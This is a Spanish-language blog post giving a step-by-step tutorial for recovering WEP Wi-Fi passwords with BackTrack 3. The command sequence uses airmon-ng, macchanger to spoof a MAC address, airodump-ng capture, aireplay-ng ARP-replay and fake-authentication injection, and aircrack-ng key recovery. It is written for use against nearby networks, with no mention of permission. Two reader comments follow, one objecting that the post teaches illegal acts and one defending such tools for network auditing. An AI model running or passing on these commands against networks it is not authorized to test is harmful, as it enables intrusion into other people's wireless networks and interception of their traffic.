Es cierto que hay tutoriales más avanzados para obtener contraseñas WEP, e incluso WPA, con versiones más modernas de BackTrack, como la versión 5, pero me quería estrenar en este sitio con algo que me conozco casi de memoria. Tranquilos, tengo pendiente jugar un poco con BackTrack 5 para sacar un nuevo tutorial más actualizado.

obtener wep

Pero bueno, a lo que vamos, cómo obtener contraseñas WEP usando la versión 3 de BackTrack. Lo primero y fundamental es tener BackTrack instalado en otra partición o en una máquina virtual. Después, simplemente hay que seguir los siguientes pasos:
1. Primero hay que comprobar si hay alguna red WEP cercana. Para ello, vamos a Inicio -> Internet -> Wireless Assistant”.

2. Después abrimos la consola y tecleamos los siguientes comandos:

airmon-ng stop wifi0
ifconfig wifi0 down
macchanger --mac 00:11:22:33:44:55 wifi0
airmon-ng start wifi0 -c (Canal)
airodump-ng wifi0

3. Miramos el BSSID y lo copiamos. A continuación, tecleamos lo siguiente:

airodump-ng -c (canal) -w mike --bssid (BSSID copiado) wifi0

4. Desde una nueva consola iniciamos un ataque de tipo 3 (Reinyección de peticiones ARP). Si hay algún cliente conectado a la red que atacamos, en -h usaremos la MAC del cliente en lugar de la nuestra falseada de la siguiente forma:

aireplay-ng -3 -b (BSSID que hemos copiado) -h 00:11:22:33:44:55 wifi0

5. Si no hay ningún cliente conectado a la red que atacamos, desde una nueva consola iniciamos un ataque de tipo 1 (autenticación falsa) para generar tráfico:

aireplay-ng -1 0 -a (BSSID que hemos copiado) -h 00:11:22:33:44:55 -e (ESSID) wifi0

6. Por último, esperamos a que el #Data en el airodump-ng vaya subiendo hasta llegar como mínimo a 30.000, y después desde una nueva consola probamos el primer comando (aircrack-ng n 64 mike-01.cap) y en unos minutos ya tendremos la clave.

Y esto ha sido todo, espero que os haya gustado el tutorial y esperemos volver a publicar algún tutorial por aquí pronto.

9 COMENTARIOS

  1. Me parece una mala política enseñar tutoriales para vulnerar la ley. Creo que debíais reflexionar si este artículo ha debido publicarse. En mi opinión no, y la verdad me siento defraudado que se enseñen determinadas prácticas desde un sitio que promociona el software libre.

    • Piensa que mucho material es para desarrolladores y técnicos, y estos programas también tienen su lado bueno, se llama “Auditar redes”.
      Este es un ejemplo de un software que se puede usar para el bien o para el mal, pero no por tener esas dos opciones debe de estar prohibido ¿no crees?

DEJA UNA RESPUESTA

Por favor, introduzca su comentario!
Por favor, introduzca su nombre aquí